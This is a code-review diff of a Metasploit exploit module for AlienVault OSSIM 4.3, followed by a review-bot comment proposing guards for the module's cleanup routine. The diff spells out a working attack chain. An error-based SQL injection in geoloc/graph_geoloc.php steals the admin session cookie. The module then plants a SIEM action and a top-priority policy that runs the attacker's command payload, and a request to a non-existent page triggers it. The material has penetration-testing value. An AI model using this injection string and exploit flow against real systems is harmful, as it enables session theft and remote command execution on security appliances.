Do module clean up

bug/bundler_fix
jvazquez-r7 2014-04-28 11:45:40 -05:00
parent 2e04bc9e4e
commit 245b591247
1 changed files with 92 additions and 90 deletions


@ -27,12 +27,14 @@ class Metasploit3 < Msf::Exploit::Remote
], ],
'References' => 'References' =>
[ [
['OSVDB', '106252'],
['EDB', '33006']
], ],
'DefaultOptions' => 'DefaultOptions' =>
{ {
'SSL' => true 'SSL' => true
}, },
'Platform' => ['unix'], 'Platform' => 'unix',
'Arch' => ARCH_CMD, 'Arch' => ARCH_CMD,
'Payload' => 'Payload' =>
{ {
@ -43,10 +45,10 @@ class Metasploit3 < Msf::Exploit::Remote
}, },
'Targets' => 'Targets' =>
[ [
['Alienvault OSSIM', {}] ['Alienvault OSSIM 4.3', {}]
], ],
'Privileged' => true, 'Privileged' => true,
'DisclosureDate' => "Apr 28 2014", 'DisclosureDate' => "Apr 24 2014",
'DefaultTarget' => 0)) 'DefaultTarget' => 0))
register_options( register_options(
@ -58,22 +60,20 @@ class Metasploit3 < Msf::Exploit::Remote
def check def check
# Check version
vprint_status("#{peer} - Trying to detect vulnerable OSSIM")
marker = rand_text_alpha(6) marker = rand_text_alpha(6)
sqlirand = rand_text_numeric(4+rand(4)) sqli_rand = rand_text_numeric(4+rand(4))
sqli = "' and(select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(user() as char)),0x#{marker.unpack('H*')[0]})) " sqli = "' and(select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(user() as char)),0x#{marker.unpack('H*')[0]})) "
sqli << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1" sqli << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}"
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'geoloc', 'graph_geoloc.php'), 'uri' => normalize_uri(target_uri.path, 'geoloc', 'graph_geoloc.php'),
'vars_get' => { 'date_from' => sqli } 'vars_get' => { 'date_from' => sqli }
}) })
if res and res.code == 200 and res.body =~ /#{marker}726F6F74403132372E302E302E31#{marker}/ # 726F6F74403132372E302E302E31 = root@127.0.0.1 if res && res.code == 200 && res.body =~ /#{marker}726F6F7440[0-9a-zA-Z]+#{marker}/ # 726F6F7440 = root
return Exploit::CheckCode::Vulnerable return Exploit::CheckCode::Vulnerable
else else
print_status("#{res.body}")
return Exploit::CheckCode::Safe return Exploit::CheckCode::Safe
end end
@ -82,9 +82,9 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
marker = rand_text_alpha(6) marker = rand_text_alpha(6)
sqlirand = rand_text_numeric(4+rand(4)) sqli_rand = rand_text_numeric(4+rand(4))
sqli = "' and (select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(id as char)),0x#{marker.unpack('H*')[0]})) " sqli = "' and (select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(id as char)),0x#{marker.unpack('H*')[0]})) "
sqli << "from alienvault.sessions where login='admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqlirand}'='#{sqlirand}" sqli << "from alienvault.sessions where login='admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}"
print_status("#{peer} - Trying to grab admin session through SQLi") print_status("#{peer} - Trying to grab admin session through SQLi")
@ -93,9 +93,9 @@ class Metasploit3 < Msf::Exploit::Remote
'vars_get' => { 'date_from' => sqli } 'vars_get' => { 'date_from' => sqli }
}) })
if res and res.code == 200 and res.body =~ /#{marker}(.*)#{marker}/ if res && res.code == 200 && res.body =~ /#{marker}(.*)#{marker}/
adminsession = $1 admin_session = $1
@cookie = "PHPSESSID=" + ["#{adminsession}"].pack("H*") @cookie = "PHPSESSID=" + ["#{admin_session}"].pack("H*")
print_status("#{peer} - Admin session cookie is [ #{@cookie} ]") print_status("#{peer} - Admin session cookie is [ #{@cookie} ]")
else else
fail_with(Failure::Unknown, "#{peer} - Failure retrieving admin session") fail_with(Failure::Unknown, "#{peer} - Failure retrieving admin session")
@ -118,24 +118,26 @@ class Metasploit3 < Msf::Exploit::Remote
} }
}) })
if res and res.code == 200 if res && res.code == 200
print_status("#{peer} - Created Action [ #{action} ]") print_status("#{peer} - Created Action [ #{action} ]")
else else
fail_with(Failure::Unknown, "#{peer} - Action creation failed!") fail_with(Failure::Unknown, "#{peer} - Action creation failed!")
end end
# Retrieving the Action ID, used to clean up the action after succesful exploitation # Retrieving the Action ID, used to clean up the action after successful exploitation
post_vars = "page=1&rp=2000"
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "ossim", "action", "getaction.php"), 'uri' => normalize_uri(target_uri.path, "ossim", "action", "getaction.php"),
'cookie' => @cookie, 'cookie' => @cookie,
'data' => post_vars 'vars_post' => {
'page' => '1',
'rp' => '2000'
}
}) })
if res and res.code == 200 and res.body =~ /actionform.php\?id=(.*)'>#{action}/ if res && res.code == 200 && res.body =~ /actionform\.php\?id=(.*)'>#{action}/
@actionid = $1 @action_id = $1
print_status("#{peer} - Action ID is [ #{@actionid} ]") print_status("#{peer} - Action ID is [ #{@action_id} ]")
else else
fail_with(Failure::Unknown, "#{peer} - Action ID retrieval failed!") fail_with(Failure::Unknown, "#{peer} - Action ID retrieval failed!")
end end
@ -143,7 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Retrieving the policy data, necessary for proper cleanup after succesful exploitation # Retrieving the policy data, necessary for proper cleanup after succesful exploitation
res = send_request_cgi({ res = send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "policy", "policy.php"), 'uri' => normalize_uri(target_uri.path.to_s, "ossim", "policy", "policy.php"),
'cookie' => @cookie, 'cookie' => @cookie,
'vars_get' => { 'vars_get' => {
'm_opt' => 'configuration', 'm_opt' => 'configuration',
@ -152,10 +154,10 @@ class Metasploit3 < Msf::Exploit::Remote
} }
}) })
if res and res.code == 200 and res.body =~ /getpolicy.php\?ctx=(.*)\&group=(.*)',/ if res && res.code == 200 && res.body =~ /getpolicy\.php\?ctx=(.*)\&group=(.*)',/
policyctx = $1 policy_ctx = $1
policygroup = $2 policy_group = $2
print_status("#{peer} - Policy data [ ctx=#{policyctx} ] and [ group=#{policygroup} ] retrieved!") print_status("#{peer} - Policy data [ ctx=#{policy_ctx} ] and [ group=#{policy_group} ] retrieved!")
else else
fail_with(Failure::Unknown, "#{peer} - Retrieving Policy data failed!") fail_with(Failure::Unknown, "#{peer} - Retrieving Policy data failed!")
end end
@ -169,8 +171,8 @@ class Metasploit3 < Msf::Exploit::Remote
'vars_post' => { 'vars_post' => {
'descr' => policy, 'descr' => policy,
'active' => '1', 'active' => '1',
'group' => policygroup, 'group' => policy_group,
'ctx' => policyctx, 'ctx' => policy_ctx,
'order' => '1', # Makes this the first policy, overruling all the other policies 'order' => '1', # Makes this the first policy, overruling all the other policies
'action' => 'new', 'action' => 'new',
'sources[]' => '00000000000000000000000000000000', # Source is ANY 'sources[]' => '00000000000000000000000000000000', # Source is ANY
@ -201,7 +203,7 @@ class Metasploit3 < Msf::Exploit::Remote
'end_day_week' => '7', 'end_day_week' => '7',
'end_day_month' => '31', 'end_day_month' => '31',
'end_month' => '12', 'end_month' => '12',
'actions[]' => @actionid, 'actions[]' => @action_id,
'sim' => '1', 'sim' => '1',
'priority' => '1', 'priority' => '1',
'qualify' => '1', 'qualify' => '1',
@ -211,7 +213,7 @@ class Metasploit3 < Msf::Exploit::Remote
} }
}) })
if res and res.code == 200 if res && res.code == 200
print_status("#{peer} - Created Policy [ #{policy} ]") print_status("#{peer} - Created Policy [ #{policy} ]")
else else
fail_with(Failure::Unknown, "#{peer} - Policy creation failed!") fail_with(Failure::Unknown, "#{peer} - Policy creation failed!")
@ -223,23 +225,22 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => normalize_uri(target_uri.path, "ossim", "policy", "getpolicy.php"), 'uri' => normalize_uri(target_uri.path, "ossim", "policy", "getpolicy.php"),
'cookie' => @cookie, 'cookie' => @cookie,
'vars_get' => { 'vars_get' => {
'ctx' => policyctx, 'ctx' => policy_ctx,
'group' => policygroup 'group' => policy_group
}, },
'vars_post' => { 'vars_post' => {
'page' => '1', 'page' => '1',
'rp' => '2000' 'rp' => '2000'
} }
}) })
if res and res.code == 200 and res.body =~ /row id='(.*)' col_order='1'/ if res && res.code == 200 && res.body =~ /row id='(.*)' col_order='1'/
@policyid = $1 @policy_id = $1
print_status("#{peer} - Policy ID [ #{@policyid} ] retrieved!") print_status("#{peer} - Policy ID [ #{@policy_id} ] retrieved!")
else else
fail_with(Failure::Unknown, "#{peer} - Retrieving Policy ID failed!") fail_with(Failure::Unknown, "#{peer} - Retrieving Policy ID failed!")
end end
# Reload the policies to make our new policy active # Reload the policies to make our new policy active
policy = rand_text_alpha(8)
print_status("#{peer} - Reloading Policies") print_status("#{peer} - Reloading Policies")
res = send_request_cgi({ res = send_request_cgi({
'method' => 'GET', 'method' => 'GET',
@ -251,7 +252,7 @@ class Metasploit3 < Msf::Exploit::Remote
} }
}) })
if res and res.code == 200 if res && res.code == 200
print_status("#{peer} - Policies reloaded!") print_status("#{peer} - Policies reloaded!")
else else
fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!") fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!")
@ -259,15 +260,15 @@ class Metasploit3 < Msf::Exploit::Remote
# Request a non-existing page, which will trigger a SIEM event (and thus our payload), but not an alarm. # Request a non-existing page, which will trigger a SIEM event (and thus our payload), but not an alarm.
dontexist = rand_text_alpha(8+rand(4)) dont_exist = rand_text_alpha(8+rand(4))
print_status("#{peer} - Triggering policy and action by requesting a non existing url") print_status("#{peer} - Triggering policy and action by requesting a non existing url")
res = send_request_cgi({ res = send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri(target_uri.path, dontexist), 'uri' => normalize_uri(target_uri.path, dont_exist),
'cookie' => @cookie 'cookie' => @cookie
}) })
if res and res.code == 404 if res && res.code == 404
print_status("#{peer} - Payload delivered") print_status("#{peer} - Payload delivered")
else else
fail_with(Failure::Unknown, "#{peer} - Payload failed!") fail_with(Failure::Unknown, "#{peer} - Payload failed!")
@ -277,58 +278,59 @@ class Metasploit3 < Msf::Exploit::Remote
def cleanup def cleanup
# Clean up, retrieve token so that the policy can be removed begin
print_status("#{peer} - Cleaning up") # Clean up, retrieve token so that the policy can be removed
res = send_request_cgi({ print_status("#{peer} - Cleaning up")
'method' => 'POST', res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "ossim", "session", "token.php"), 'method' => 'POST',
'cookie' => @cookie, 'uri' => normalize_uri(target_uri.path, "ossim", "session", "token.php"),
'vars_post' => { 'f_name' => 'delete_policy' } 'cookie' => @cookie,
}) 'vars_post' => { 'f_name' => 'delete_policy' }
})
if res and res.code == 200 and res.body =~ /\{\"status\":\"OK\",\"data\":\"(.*)\"\}/ if res && res.code == 200 && res.body =~ /\{\"status\":\"OK\",\"data\":\"(.*)\"\}/
token = $1 token = $1
print_status("#{peer} - Token [ #{token} ] retrieved") print_status("#{peer} - Token [ #{token} ] retrieved")
else else
print_warning("#{peer} - Unable to retrieve token") print_warning("#{peer} - Unable to retrieve token")
end
# Remove our policy
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "policy", "deletepolicy.php"),
'cookie' => @cookie,
'vars_get' => {
'confirm' => 'yes',
'id' => @policy_id,
'token' => token
}
})
if res && res.code == 200
print_status("#{peer} - Policy ID [ #{@policy_id} ] removed")
else
print_warning("#{peer} - Unable to remove Policy ID")
end
# Remove our action
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "action", "deleteaction.php"),
'cookie' => @cookie,
'vars_get' => {
'id' => @action_id,
}
})
if res && res.code == 200
print_status("#{peer} - Action ID [ #{@action_id} ] removed")
else
print_warning("#{peer} - Unable to remove Action ID")
end
ensure
super # mixins should be able to cleanup even in case of Exception
end end
# Remove our policy
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "policy", "deletepolicy.php"),
'cookie' => @cookie,
'vars_get' => {
'confirm' => 'yes',
'id' => @policyid,
'token' => token
}
})
if res and res.code == 200
token = $1
print_status("#{peer} - Policy ID [ #{@policyid} ] removed")
else
print_warning("#{peer} - Unable to remove Policy ID")
end
# Remove our action
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "action", "deleteaction.php"),
'cookie' => @cookie,
'vars_get' => {
'id' => @actionid,
}
})
if res and res.code == 200
token = $1
print_status("#{peer} - Action ID [ #{@actionid} ] removed")
else
print_warning("#{peer} - Unable to remove Action ID")
end
end end
end end
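Review bot: The rewritten cleanup still issues the deletepolicy.php and deleteaction.php requests when the state it relies on was never set — `@cookie`, `@policy_id` and `@action_id` are nil after an early fail_with in exploit() or when only check() ran, and `token` is nil on the "Unable to retrieve token" branch — so the new begin/ensure wrapper keeps `super` safe but the requests themselves go out with empty ids and can only end in "Unable to remove" warnings. Guard the work on what actually exists: `return unless @cookie` directly after `begin` (the `ensure` still runs `super`), `if @policy_id && token` around the policy removal, and `if @action_id` around the action removal. Separately, the policy.php hunk is the only request that uses `target_uri.path.to_s` while every other call passes `target_uri.path`; the two should agree. The comment in that same hunk still reads "succesful" although the getaction.php hunk corrects the spelling.
```ruby
def cleanup
  begin
    # Nothing to undo unless exploit() got as far as an admin session
    return unless @cookie
    # … unchanged: token retrieval via session/token.php …
    if @policy_id && token
      # … unchanged: deletepolicy.php request and its status messages …
    end
    if @action_id
      # … unchanged: deleteaction.php request and its status messages …
    end
  ensure
    super # mixins should be able to cleanup even in case of Exception
  end
end
```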